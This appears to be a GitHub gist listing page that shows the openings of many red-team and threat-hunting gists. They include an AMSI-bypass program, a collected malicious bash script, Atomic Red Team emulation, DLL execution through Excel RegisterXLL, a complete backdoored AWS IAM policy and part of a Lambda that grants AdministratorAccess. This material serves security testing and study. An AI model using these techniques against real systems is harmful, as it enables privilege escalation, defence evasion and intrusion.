sasqwatch
using System;
using System.Runtime.InteropServices;
namespace AMSIBypass2
{
class Program
{
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);
@sasqwatch
sasqwatch / bashscript.sh
Created May 6, 2019 18:59 — forked from JohnLaTwC/bashscript.sh
Bash script: 077d51016727216dd6216a3722353be274288d411a6295a5d804d251dacd88fc
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the Old-ReBuild Lady job copy
#
#Goal:
# The goal of this campaign is as follows;
# - To keep the internet safe.
# - To keep them hackers from causing real damage to organisations.
# - We know you feel We are a potential threat, well We ain't.
@sasqwatch
sasqwatch / test_chain_reaction.ps1
Created May 3, 2019 18:25
MITRE ATT&CK Group 0007
Import-Module .\execution-frameworks\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam.psm1
$G0007 = @("T1002","T1003","T1005","T1014","T1027","T1037","T1040","T1056","T1057","T1059","T1064","T1070","T1071","T1074","T1075","T1083","T1085","T1086","T1090"
,"T1099","T1105","T1107","T1113","T1114","T1119","T1122","T1134","T1137","T1140","T1158","T1173" )
foreach ($technique in $G0007)
{
try
{
New-Variable -Name "$technique" -Value (Get-AtomicTechnique ".\atomics\$technique\$technique.yaml")
}
catch {}
@sasqwatch
sasqwatch / 01. setup.sh
Created May 1, 2019 22:21 — forked from Integralist/01. setup.sh
Kali Linux Vim + Bash setup
# use VirtualBox's device menu to insert Guest Additions CDROM
# copy VBoxLinuxAdditions.run from mounted CDROM
# then eject the CDROM, run the script and then shutdown the VM
# you'll then go into VirtualBox and setup shared directories etc
cd ~ && eject /media/cdrom0
sudo chmod 755 VBoxLinuxAdditions.run
./VBoxLinuxAdditions.run
curl https://raw.githubusercontent.com/git/git/master/contrib/completion/git-prompt.sh -o ~/.git-prompt.sh
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
@sasqwatch
sasqwatch / prepare-kali.sh
Created May 1, 2019 21:55 — forked from mgeeky/prepare-kali.sh
A script that prepares Kali by collecting many useful tools of the trade in the /root/tools directory, installing requirements, setting them up, preparing .bashrc, etc.
#!/bin/bash
# Well, the entire Kali installation assumes that we are normally working as root on our Kali.
# I know that assumption sucks to its root, but I wanted to avoid every "permission denied" issue and I was too lazy
# to get it done properly as a non-root user.
if [ $EUID -ne 0 ]; then
echo "This script must be run as root."
exit 1
fi
@sasqwatch
sasqwatch / ExcelXLL.md
Created April 27, 2019 00:28 — forked from mgeeky/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV; they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@sasqwatch
sasqwatch / backdoored-aws-policy.json
Created April 27, 2019 00:28 — forked from mgeeky/backdoored-aws-policy.json
Example of a Backdoored AWS policy to be used in iam:CreatePolicyVersion privilege escalation vector (aws iam create-policy-version --policy-document)
{
"Version": "2012-10-17",
"Statement": [
{
"Action": "*",
"Effect": "Allow",
"Resource": "*"
}
]
}
@sasqwatch
sasqwatch / lambda-backdoor-cloudgoat-role.py
Created April 27, 2019 00:28 — forked from mgeeky/lambda-backdoor-cloudgoat-role.py
Lambda that backdoors CloudGoat's lambda-dynamodb-cloudgoat role by granting it the AdministratorAccess managed policy. As soon as this Lambda gets invoked by an HTTP event, it will return temporary AWS session credentials.
import boto3
import json
POLICIES_TO_ATTACH = [
'arn:aws:iam::aws:policy/AdministratorAccess',
]
ROLE_TO_BACKDOOR = 'lambda-dynamodb-cloudgoat'
@sasqwatch
sasqwatch / Native-Windows-Useragents-malicious.txt
Created April 26, 2019 19:06 — forked from GossiTheDog/Native-Windows-Useragents-malicious.txt
Native Windows UserAgents for Threat Hunting
//Invoke-WebRequest in Powershell - manually whitelist legit content first:
Mozilla/*WindowsPowerShell/*
System.Net.WebClient.DownloadFile():
None
//Start-BitsTransfer - manually whitelist legit content first:
Microsoft BITS/*
//certutil.exe - manually whitelist legit content first: